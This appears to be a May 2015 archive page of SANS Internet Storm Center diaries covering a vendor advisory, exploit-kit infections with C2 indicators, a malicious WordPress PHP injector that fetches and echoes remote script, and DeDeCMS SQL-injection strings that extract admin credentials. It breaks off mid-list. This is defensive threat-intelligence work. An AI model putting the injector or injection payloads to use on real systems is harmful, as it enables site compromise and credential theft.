Diaries

Published: 2015-05-31

Blue Coat: SSL Visibility Appliance web based vulnerabilities

Blue Coat has released a security advisory for SSL Visibility Appliance. The SSL Visibility Appliance is susceptible to multiple web-based vulnerabilities in the administration console. A remote attacker can use these vulnerabilities to obtain administrative access to the SSL Visibility Appliance. All versions of SSL Visibility prior to 3.8.4 are vulnerable.

The vulnerabilities exist in the WebUI are: 

  • Cross-Site Request Forgery (CVE-2015-2852): Cross-site request forgery (CSRF) vulnerability in the WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 allows remote attackers to hijack the authentication of administrators.

 

  • Clickjacking due to improper input validation (CVE-2015-2854): The WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 does not send a restrictive X-Frame-Options HTTP header, which allows remote attackers to conduct clickjacking attacks via vectors involving an IFRAME element.

 

  • Cookie theft (CVE-2015-2855): The WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 does not set the secure flag for the administrator's cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, a different vulnerability than CVE-2015-4138.

 

  • Session fixation.(CVE-2015-2853): Session fixation vulnerability in the WebUI component in Blue Coat SSL Visibility Appliance SV800, SV1800, SV2800, and SV3800 3.6.x through 3.8.x before 3.8.4 allows remote attackers to hijack web sessions by providing a session ID.

 

Workarounds:

Limit access to the SSL Visibility management port to trusted clients with limited access to the outside internet.  SSLV can be configured to limit the IP addresses capable of accessing the management port.

Limit administrative capabilities by assigning distinct roles for different types of administrators.

Use ProxySG and WebPulse to block access to malicious websites from clients.

Patches: 

SSL Visibility
SSLV 3.8 – a fix is available in 3.8.4.
SSLV 3.8.2f – a fix will not be provided.  Please upgrade to the latest release with the vulnerability fix.
SSLV 3.7.4 – a fix will not be provided.  Please upgrade to the latest release with the vulnerability fix.

 

For further details:

  1. https://bto.bluecoat.com/security-advisory/sa96
  2. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2852
  3. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2853
  4. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2854
  5. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2855

 

 

0 Comments

Published: 2015-05-30

Weekend Learning - Spoofer Project

Happy weekend, everyone. Often times there is extra margin on the weekends to learn something new. This weekend I encourage you to consider learning more about the Spoofer project, as recommended by a fellow ISC Handler. With the recent announcement that the Spoofer project is funded and has clients for multiple operating systems, I encourage you to put this project on your weekend "to do list”.
 
As a visual learner, I found their summary report listing the current state of source address spoofing compelling. As we all strive to improve our Cyber Security posture, efforts the Spoofer project plays a role in improving our "Cyber Hygiene”.
 
Please use the comments section below to let us all know your experience.
 
Russell Eubanks
@russelleubanks

1 Comments

Published: 2015-05-29

Trust But Verify

Be intentional about how you spend your time. I believe that every person can incrementally improve their security program by being intentional about how they spend their time. One method is to be intentional about checking several items for compliance each and every month. While not intended to replace the value of an auditor, this approach can generate incremental value from the overall compliance process. If you have the requirement to be in compliance with PCI, you are in luck! You could easily create a table that pairs one of the 12 categories with one of the 12 months in a calendar year. Inside each month, you could list several items that are important to verify. When printed out and kept nearby, it can serve as a reminder to be diligent about tracking progress over time. Compare this table year over year and look for trends that will help identify the sometimes small areas to focus on that can make a big impact.
 
I have used this approach to expect more out of myself and to set the bar just a little bit higher. I found success in showing this matrix to outside auditors and received positive feedback. There was nothing magic about this table, it just forced me to be intentional each and every month. Using this approach, unexpected “compliance drift” can be identified and remediated on a much more timely basis. This approach can be used inside several of the regulatory compliance requirements. If you do not have one, ask friends and colleagues who do to learn what they find beneficial in their respective environments. As always, a great place to start is with the 20 Security Controls.
 
Can you make it easier on yourself to do the right thing by being intentional? It believe it is absolutely possible to leverage systems like this to make it easier to do the right thing.
 
What systems do you use to force you to be intentional? Please use the comments section to share what works for you.
 
Russell Eubanks
@russelleubanks

1 Comments

Published: 2015-05-28

Angler exploit kit pushing CryptoWall 3.0

Introduction

In the past two days, I've infected two hosts from Angler exploit kit (EK) domains at 216.245.213.0/24.  Both hosts were infected with CryptoWall 3.0 ransomware using the same bitcoin address for the ransom payment: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB

On Tuesday, 2015-05-26 at 15:17 UTC, I infected a host where Angler EK sent Bedep as a malware payload before getting CryptoWall 3.0 [1].  On Wednesday, 2015-05-27 at 17:30 UTC, I infected a host where Angler EK sent CryptoWall 3.0 as the malware payload.

I usually see Angler EK send different types of ransomware [2, 3], and I've seen plenty of CryptoWall 3.0 samples from Magnitude EK; however, this is the first time I've noticed CryptoWall from Angler EK.


Shown above: CryptWall 3.0 decrypt instructions from the 2015-05-27 sample

Traffic from the infected host

CryptoWall 3.0 traffic has changed a bit from my first diary about it on 2015-01-19 [4].  Traffic below was seen from the infected host on 2015-05-27 starting at 17:30 UTC.


Shown above: Angler EK and CryptWall 3.0 traffic as seen in Wireshark

Associated domains:

  • 216.245.213.5 port 80 - vanskeligstesjeverozapadne1.xadultchat.com - Angler EK
  • 91.184.19.41 port 80 - autorijschoolconsistent.nl - CryptoWall 3.0 check-in
  • 213.186.33.50 port 80 - jeanrey.fr - CryptoWall 3.0 check-in
  • 50.62.123.1 port 80 - 3bsgroup.com - CryptoWall 3.0 check-in
  • 75.103.83.9 port 80 - braingame.biz - CryptoWall 3.0 check-in
  • 62.221.204.114 port 80 - alsblueshelpt.nl - CryptoWall 3.0 check-in
  • 184.168.47.225 port 80 - ammorgan.net - CryptoWall 3.0 check-in
  • 79.96.220.223 port 80 - bezpiecznaswinka.pl - CryptoWall 3.0 check-in
  • 148.251.140.60 port 80 - asadiag.com - CryptoWall 3.0 check-in
  • 184.168.47.225 port 80 - alchemyofpresence.com - CryptoWall 3.0 check-in 
  • 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paygateawayoros.com - CryptoWall decrpyt instructions
  • 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paymentgateposa.com - CryptoWall decrpyt instructions
  • 7oqnsnzwwnm6zb7y.optionpaymentprak.com (didn't resolve in DNS) - CryptoWall decrpyt instructions
  • 7oqnsnzwwnm6zb7y.watchdogpayment.com (didn't resolve in DNS) - CryptoWall decrpyt instructions

Angler EK:

  • vanskeligstesjeverozapadne1.xadultchat.com - GET /molehill_inconsolably_erecting_prematureness/174208500231771131
  • vanskeligstesjeverozapadne1.xadultchat.com - GET /OEmjzR2jUP6JG0o9h494My_bK-qvpSFR6NcLcwz5j32hxI3s
  • vanskeligstesjeverozapadne1.xadultchat.com - GET /BjWMS7ksUcb9SztLJX7JlXe95voNnRcc7DfUJzRGbqTqKe8X

CryptoWall 3.0 check-in traffic:

  • ip-addr.es - GET /
  • autorijschoolconsistent.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?c=mr3jkiznke20nfh
  • jeanrey.fr - POST /wp-content/uploads/wpallimport/uploads/3aa8810fe8a85c3aeaf70245feaf0a41/img3.php?w=mr3jkiznke20nfh
  • 3bsgroup.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?t=mr3jkiznke20nfh
  • braingame.biz - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?x=mr3jkiznke20nfh
  • alsblueshelpt.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?n=mr3jkiznke20nfh
  • asambleadedios.org - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?z=mr3jkiznke20nfh
  • ammorgan.net - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?o=mr3jkiznke20nfh
  • bezpiecznaswinka.pl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?k=mr3jkiznke20nfh
  • asadiag.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?q=mr3jkiznke20nfh
  • alchemyofpresence.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?z=mr3jkiznke20nfh

Note: These URLs repeated several times with different random strings at the end.

Traffic caused by viewing the CryptoWall decrypt instructions in a browser:

  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /1kwN8ko
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/style.css
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/us.png
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/it.png
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rt.png
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/fr.png
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /picture.php?k=1kwn8ko&4d2156f57fb503178f62c2f95690e599
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rb.png
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/es.png
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/de.png
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lb.png
  • 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lt.png


Shown above: Emerging Threats-based Snort events on the infection traffic using Security Onion

Preliminary malware analysis

Malware payload delivered by Angler EK on 2015-05-27:

Final words

A pcap of the 2015-05-27 infection traffic is available at:

A zip file of the associated malware is available at:

The zip file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://malware-traffic-analysis.net/2015/05/26/index.html
[2] https://isc.sans.edu/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681
[3] http://malware-traffic-analysis.net/2015/03/25/index.html
[4] https://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203

2 Comments

Published: 2015-05-26

Possible Wordpress Botnet C&C: errorcontent.com

Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):

 

#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */


/* only run the code if this is Chrome or IE and not a "bot" */

if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{  

# Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]

  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?  ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

# check if we have the curl extension installed 

if (function_exists('curl_init') && function_exists('curl_exec')) {

$ch= curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$wp_8610mezd = curl_exec ($ch);
curl_close($ch);}

# if we don't have curl, try file_get_contents which requires allow_url_fopen.

elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_8610mezd = @file_get_contents($wp_mezd098610);}

# or try fopen as a last resort
​elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));}}

if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }

# The data retrieved will be echoed back to the user if it starts with the string "scr".

 

I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet will be appreciated.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

3 Comments

Published: 2015-05-23

Business Value in "Big Data"

There is more information available as to what Big Data really mean. In the type of business that most of us deal with daily, you are likely swamped by huge amount of structured or unstructured data that is entirely, partially or not at all collected. Some of the reasons to collect that data are for competitive advantages, network security, operational issues, etc. but the power of that information is really to make timely decisions.

A study conducted by Forester in 2011 estimated "[...] that firms effectively utilize less than 5% of available data. Why so little? The rest is simply too expensive to deal with."[1] That still leaves 95% of untouched and unanalyzed data. Depending who you ask what is big data to you; you may get different answers such as volume, speed, variety, type and quality. Depending of the size of the network, you may lack the storage capacity to ingest and process everything the network is capable of generating and made difficult choices on what is more important to collect to make those timely decisions.

I think in order to make significant gain in collecting Big Data, there is a need comprehensive approach to managing data, how it is analyzed to gain information intelligence. That means choosing the right data, turning structured or unstructured into a common format (i.e. CEF is a widely supported format), reduce data footprint by keeping and aggregating a single copy of similar data (deduplication) and an archiving policy for old data.

We would like to hear from you. Are you currently evaluating what to do with your data and base on your current security posture, do you think the data you currently collect is enough to get valuable insight as to what is going on inside your network?

Note: If interested in sharing, Stephen Northcutt is currently looking for SEIM/SIEM success stories.

[1] http://blogs.forrester.com/brian_hopkins/11-09-30-big_data_will_help_shape_your_markets_next_big_winners
[2] https://protect724.hp.com/docs/DOC-1072
[3] https://www.linkedin.com/pulse/seimsiem-success-story-request-stephen-northcutt?trk=mp-reader-card

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

0 Comments

Published: 2015-05-22

Lazy Coordinated Attacks Against Old Vulnerabilities

Typically we try to device attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistance) to more advanced state sponsored attackers (lots of resources, decent skills and ability to conduct long lasting persistent attacks).

So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS being conducted from what looks like several IP addresses at the same time, that appeared to share the load.

The attack:

GET /uploads/plus/search.php?keyword=11&amp; typeArr[%60@%27%60and%28SELECT 1%20FROM%28select count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29 from dede_admin Limit 0,1%29%29a from information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"

DeDeCMS is a Drupal like content management system popular in China [1]. Exploits like the one above have been used at least since 2013 [2]. The site that was attacked above does not use DeDeCMS, so the attacker did not do any recognizance.

The attacker also doesn't bother modifying the user agent and keep the "Python-urllib/2.7" user agent indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.

The SQL statement that is being attempted:

SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1

A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.

Sort of interesting: These were not the only attacks from these two IP addresses, and they did start out with some recognizance:

GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Here they spoof the Google user agent. The even first try out the "plus/search.php" URL:

GET //plus/search.php?keyword=as&typeArr[111%3D@`\x5C'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C'`+]=a HTTP/1.1" 404 9093 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

But even though it returns a 404, they still proceed with the attack. 

 

[1] http://dedecms.com
[2] http://0day5.com/archives/341

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

1 Comments

Published: 2015-05-21

Exploit kits delivering Necurs

Introduction

In the past few days, we've seen Nuclear and Angler exploit kits (EKs) delivering malware identified as Necurs.  It certainly isn't the only payload sent from Nuclear and other EKs, but I hadn't really looked into EK traffic sending Necurs lately.

Documented as early as 2012, Necurs is a type of malware that opens a back door on the infected computer [1].  It may also disable antivirus products as well as download additional malware [1][2].

I saw Necurs as a malware payload from Nuclear and Angler EKs last week [3][4].  In each case, traffic went through a gate on 185.14.30.218 (between the compromised website and the EK landing page).

We ran across Nuclear EK delivering Necurs again on 2015-05-20.  In this example, the gate was on 91.121.63.249.

I can't share info on the compromised website that kicked off this infection chain; however, we can look at the rest of the traffic.

Infection traffic details

Associated domains:

  • 91.121.63.249 port 80 - try.jleveux.com - Redirect (gate) to exploit kit
  • 162.247.13.233 port 80 - os.jackmap.com -  Nuclear EK
  • 188.165.138.220 port 80 - 188.165.138.220 - Post-infection HTTP traffic caused by Necurs
  • various IP addresses on various ports - Other post-infection traffic (see below)


Shown above: Emerging Threats-based Snort events on the infection traffic using Security Onion

Redirect (gate) leading to the EK:

  • 2015-05-20 17:03:32 UTC - try.jleveux.com - GET /js/view.js

Nuclear EK:

  • 2015-05-20 17:03:32 UTC - os.jackmap.com - GET /CQEWFR9SHVgRTQkCAlwPAhNNAlgP.html
  • 2015-05-20 17:03:33 UTC - os.jackmap.com - GET /BE8SHwtVFUEeUh9SHVgRTQkCAlwPAhNNAlgPH1VVTwZaVE1VVhlTW1EfUANRUVJXUANTUB8FDQY
  • 2015-05-20 17:03:34 UTC - os.jackmap.com - GET /B14OBh8LV0MUH1IfUEsNEE0JAFQJDgITT1QNDh9VVxlTW1RNVwBMUltRHQZWUFFSVQZWUlAfVEsxIBARBkc
  • 2015-05-20 17:03:36 UTC - os.jackmap.com - GET /B14OBh8LV0MUH1IfHVgRTQkCAlwPAhNNAlgPH1VVTwZaVE1VVhlTW1EfUANRUVJXUANTUB9WHXIAJyE5MHM

HTTP POST requests from the infected host:

  • 2015-05-20 17:03:52 UTC - 188.165.138.220 - POST /forum/db.php
  • 2015-05-20 17:03:53 UTC - 188.165.138.220 - POST /forum/db.php
  • 2015-05-20 17:03:53 UTC - 188.165.138.220 - POST /forum/db.php
  • 2015-05-20 17:04:46 UTC - 188.165.138.220 - POST /forum/db.php

DGA-style DNS requests from the infected host:

  • 2015-05-20 17:03:37 UTC - DNS query for: tihvekkgxvjjstk.com - server response: No such name
  • 2015-05-20 17:03:37 UTC - DNS query for: aywqalevruhie.com - server response: No such name
  • 2015-05-20 17:03:37 UTC - DNS query for: jdwkjeyumdxbc.com - server response: No such name
  • 2015-05-20 17:03:37 UTC - DNS query for: nsktpgiexicpnt.com - server response: No such name
  • 2015-05-20 17:03:38 UTC - DNS query for: npkxghmoru.biz - server response: No such name
  • 2015-05-20 17:04:37 UTC - DNS query for: llncjudabb.com - server response: No such name
  • 2015-05-20 17:04:37 UTC - DNS query for: veqtdpofgjwe.com - server response: No such name
  • 2015-05-20 17:04:37 UTC - DNS query for: acsgneqxcsoyvmc.com - server response: No such name
  • 2015-05-20 17:04:37 UTC - DNS query for: lbvruinysrbpyjr.com - server response: No such name
  • 2015-05-20 17:04:37 UTC - DNS query for: npkxghmoru.biz - server response: No such name

UDP packets sent from the infected host:

  • 2015-05-20 17:03:42 UTC - 192.168.122.202 port 18672 - 95.87.49.120 port 13099
  • 2015-05-20 17:03:47 UTC - 192.168.122.202 port 18672 - 87.69.21.149 port 17931 (return traffic noted)
  • 2015-05-20 17:03:52 UTC - 192.168.122.202 port 18672 - 85.86.36.76 port 9535
  • 2015-05-20 17:04:23 UTC - 192.168.122.202 port 18672 - 123.193.182.220 port 11772
  • 2015-05-20 17:04:33 UTC - 192.168.122.202 port 18672 - 82.210.187.14 port 7309
  • 2015-05-20 17:04:38 UTC - 192.168.122.202 port 18672 - 158.109.235.80 port 8202
  • 2015-05-20 17:04:43 UTC - 192.168.122.202 port 18672 - 93.123.40.76 port 26871
  • 2015-05-20 17:05:48 UTC - 192.168.122.202 port 18672 - 46.35.207.228 port 5844
  • 2015-05-20 17:09:48 UTC - 192.168.122.202 port 18672 - 128.131.102.41 port 15037
  • 2015-05-20 17:10:48 UTC - 192.168.122.202 port 18672 - 79.116.151.17 port 10223
  • 2015-05-20 17:11:48 UTC - 192.168.122.202 port 18672 - 109.245.156.224 port 17975
  • 2015-05-20 17:12:48 UTC - 192.168.122.202 port 18672 - 186.22.5.205 port 28181
  • 2015-05-20 17:13:48 UTC - 192.168.122.202 port 18672 - 197.129.0.92 port 19877
  • 2015-05-20 17:15:48 UTC - 192.168.122.202 port 18672 - 150.217.108.178 port 31812
  • 2015-05-20 17:17:48 UTC - 192.168.122.202 port 18672 - 109.54.13.232 port 5483
  • 2015-05-20 17:19:48 UTC - 192.168.122.202 port 18672 - 2.193.233.219 port 13321

TCP SYN packets sent by the infected host, with no response from the server:

  • 2015-05-20 17:04:28 UTC - 192.168.122.202 port 49158 - 141.20.242.66 port 12592
  • 2015-05-20 17:06:48 UTC - 192.168.122.202 port 49161 - 199.241.229.89 port 16140
  • 2015-05-20 17:08:48 UTC - 192.168.122.202 port 49162 - 190.219.222.57 port 12381
  • 2015-05-20 17:14:48 UTC - 192.168.122.202 port 49163 - 49.205.160.135 port 23582
  • 2015-05-20 17:16:48 UTC - 192.168.122.202 port 49164 - 79.2.157.254 port 8189
  • 2015-05-20 17:18:48 UTC - 192.168.122.202 port 49165 - 77.81.9.120 port 18949

Images from the traffic


Shown above: Link to the gate found in page from the compromised website


Shown above: The gate redirecting traffic to the Nuclear exploit kit landing page


Shown above: Nuclear exploit kit landing page


Shown above: Nuclear exploit kit sends a Flash exploit


Shown above: Nuclear exploit kit sends the malware payload


Shown above: HTTP traffic caused by the malware

Preliminary malware analysis

Malware payload delivered by the Nuclear exploit kit (Necurs)

Additional malware found on the infected host (Necurs-related):

Some of the registry keys for persistence:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_C4E6D8D66AF44D3\000\Control
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\c4e6d8d66af44d3
  • NOTE:  The same keys were also found in ControlSet001 and ControlSet002

Final words

A pcap of the infection traffic is available at:

A zip file of the associated malware is available at:

The zip file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://www.symantec.com/security_response/writeup.jsp?docid=2012-121212-2802-99
[2] https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Necurs
[3] http://malware-traffic-analysis.net/2015/05/14/index3.html
[4] http://malware-traffic-analysis.net/2015/05/15/index.html

 

8 Comments

Published: 2015-05-20

Logjam - vulnerabilities in Diffie-Hellman key exchange affect browsers and servers using TLS

There's a new vulnerability in town...   "The new bug, dubbed LogJam, is a cousin of Freak. But it’s in the basic design of TLS itself, meaning all Web browsers, and some email servers, are vulnerable." [1]  According to the article, "Internet-security experts crafted a fix for a previously undisclosed bug in security tools used by all modern Web browsers. But deploying the fix could break the Internet for thousands of websites."

Logjam attack can allow an attacker "to significantly weaken the encrypted connection between a user and a Web or email server..." [2]

From: https://weakdh.org/

Diffie-Hellman key exchange is a popular cryptographic algorithm that allows Internet protocols to agree on a shared key and negotiate a secure connection. It is fundamental to many protocols including HTTPS, SSH, IPsec, SMTPS, and protocols that rely on TLS.

We have uncovered several weaknesses in how Diffie-Hellman key exchange has been deployed...

We're starting to see news coverage from other outlets, and we're sure more analysis will emerge.  However, at this time your best source for more information on this bug is at weakdh.org.

For now, ensure you have the most recent version of your browser installed, and check for updates frequently.  If you’re a system administrator, please review the Guide to Deploying Diffie-Hellman for TLS at https://weakdh.org/sysadmin.html

--
Brad Duncan
ISC Handler and Security Researcher at Rackspace

References:

[1] http://www.wsj.com/articles/new-computer-bug-exposes-broad-security-flaws-1432076565
[2] http://www.pcworld.com/article/2924532/new-encryption-flaw-logjam-puts-web-surfers-at-risk.html

11 Comments

Published: 2015-05-20

Upatre/Dyre malspam - Subject: eFax message from "unknown"

Introduction

Yesterday on 2015-05-19, I attended a meeting from my local chapter of the Information Systems Security Association (ISSA).  During the meeting, one of the speakers discussed different levels of incident response by Security Operations Center (SOC) personnel.  For non-targeted issues like botnet-based malicious spam (malspam) infecting a Windows host, you probably won't waste valuable time investigating every little detail.  In most cases, you'll probably start the process to re-image the infected computer and move on.  Other suspicious events await, and they might reveal a more serious, targeted threat.

However, we still recover information about these malspam campaigns.  Traffic patterns evolve, and changes should be documented.

Today's example of malspam

Searching through my employer's blocked spam filters, I found the following Upatre/Dyre wave of malspam:

  • Date/Time: 2015-05-19 from from 12:00 AM to 5:47 AM CST
  • Number of messages: 20
  • Sender (spoofed): sent@efax-mail.co.uk
  • Subject: eFax message from "unknown" - [random number] page(s)
  • Attachment: Fax_ewew_43434.zip

As shown in the above image, these messages were tailored for the recipients.  You'll also notice some of the recipient email addresses contain random characters and numbers.  Nothing new here.  It's just one of the many waves of malspam our filters block every day.  I reported a similar wave earlier this month [1].  Let's look at the malware.

The attachment is a typical example of Upatre, much like we've seen before.  Let's see what this malware does in a controlled environment.

Indicators of compromise (IOC)

I ran the malware on a physical host and generated the following traffic:

  • 2015-05-19 15:16:12 UTC - 166.78.246.145 port 80 - icanhazip.com - GET /
  • 2015-05-19 15:16:13 UTC - 91.211.17.201 port 13410 - SYN packet to server, no response
  • 2015-05-19 15:16:16 UTC - 80.233.179.250 port 443 - two SYN packets to server, no response
  • 2015-05-19 15:16:58 UTC - 85.67.42.40 port 443 - two SYN packets to server, no response
  • 2015-05-19 15:17:40 UTC - 188.127.129.48 port 443 - SSL traffic - approx 510 KB sent from server to infected host
  • 2015-05-19 15:17:56 UTC - 217.10.68.152 port 3478 - UDP STUN traffic to: stun.sipgate.net
  • 2015-05-19 15:17:58 UTC - 62.122.69.132 port 443 - SSL traffic - approx 256 KB sent from server to infected host
  • 2015-05-19 15:18:40 UTC - 91.211.17.201 port 13409  - SYN packet to server, no response

In my last post about Upatre/Dyre, we saw Upatre-style HTTP GET requests to 91.211.17.201 but no HTTP response from the server [1].  That's been the case for quite some time now.  However, in this example, the infected host attempted a TCP connection to 91.211.17.201, but the connection was reset after the initial SYN packet, and an HTTP GET request was never sent.


Shown above: An example of Upatre-style HTTP GET requests from my previous ISC Diary on Upatre/Dyre


Shown above: Attempted TCP connections to the same IP address now reset (RST) by the server

How can we tell this is Upatre?  The malware checks for an IP address, and header lines in the associated HTTP GET request fit the pattern for Upatre.

As I've mentioned before, icanhazip.com is a service run by one of my fellow Rackspace employees [2].  By itself, it's not malicious.  Unfortunately, malware authors use this and similar services to check an infected computer's IP address.

What alerts trigger on this traffic?  See the image below for Emerging Threats-based Snort events on the infection traffic using Security Onion.

Related files on the infected host include:

  • C:\Users\username\AppData\Local\PwTwUwWTWcqBhWG.exe (Dyre)
  • C:\Users\username\AppData\Local\ne9bzef6m8.dll
  • C:\Users\username\AppData\Local\Temp\~TP95D5.tmp (encrypted or otherwise obfuscated)
  • C:\Users\username\AppData\Local\Temp\Jinhoteb.exe (where Upatre copied itself after it was run)

Some Windows registry changes for persistence:

  • Key name: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • Key name: HKEY_USERS\S-1-5-21-52162474-342682794-3533990878-1000\Software\Microsoft\Windows\CurrentVersion\Run
  • Value name: GoogleUpdate
  • Value type: REG_SZ
  • Value data: C:\Users\username\AppData\Local\PwTwUwWTWcqBhWG.exe

A pcap of the infection traffic is available at:

A zip file of the associated Upatre/Dyre malware is available at:

The zip file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

Final words

This was yet another wave of Upatre/Dyre malspam.  No real surprises, but it's always interesting to note the small changes from these campaigns.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] https://isc.sans.edu/diary/UpatreDyre+the+daily+grind+of+botnetbased+malspam/19657
[2] https://major.io/icanhazip-com-faq

5 Comments

Published: 2015-05-19

False Positive? settings-win.data.microsoft.com resolving to Microsoft Blackhole IP

Thanks to Xavier for bringing this to our attention. It looks a couple of days ago, a legitimate Microsoft host name, settings-win.data.microsoft.com started to resolve to a Microsoft IP that is commonly used for blackholes that Microsoft operates:

$ host settings-win.data.microsoft.com
settings-win.data.microsoft.com is an alias for settings.data.glbdns2.microsoft.com.
settings.data.glbdns2.microsoft.com is an alias for blackhole6.glbdns2.microsoft.com.
blackhole6.glbdns2.microsoft.com has address 131.253.18.253

Connecting to a blackhole IP like this is often an indicator of compromise, and many IDS's will flag it. For example:

[**] [1:2016101:2] ET TROJAN DNS Reply Sinkhole - Microsoft - 131.253.18.0/24 [**] [Classification: A Network Trojan was detected] [Priority: 1] ...

It is not yet clear what process causes the connect to this IP on port 443. But a number of other users are reporting similar issues. For example, see here:

https://social.technet.microsoft.com/Forums/windowsserver/en-US/37aecee6-0df9-4234-8159-c632070478ad/strange-dns-requests-blocked-by-ips?forum=winserversecurity

At this point, I am assuming that this is some kind of configuration error at Microsoft.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

4 Comments

Published: 2015-05-19

IoT roundup: Apple Watch Patches, Router Vulnerabilities

Yes, there is a security patch for the Apple Watch now. It fixes 13 different vulnerabilities. At least one of the vulnerabilities (CVE-2015-1093) can be used to execute arbitrary code. But not all of the vulnerabilities are "cutting edge". We also got an ICMP redirect issue (CVE-2015-1103) and of course SSL issues that are addressed by disabling old ciphers (FREAK vulnerability) and updating the list of trusted CAs.

The Internet of Things certainly does get a lot of attention this year, and I think rightfully so. I consider web gateways/routers a prime example, and just to make that point, here the top 10 attacks against our web application honeypot:

  25700  GET / HTTP/1.1\r\n
  10596  GET http
   9059  GET /cgi-bin/authLogin.cgi HTTP/1.1\n  <- QNAP shellshock issue
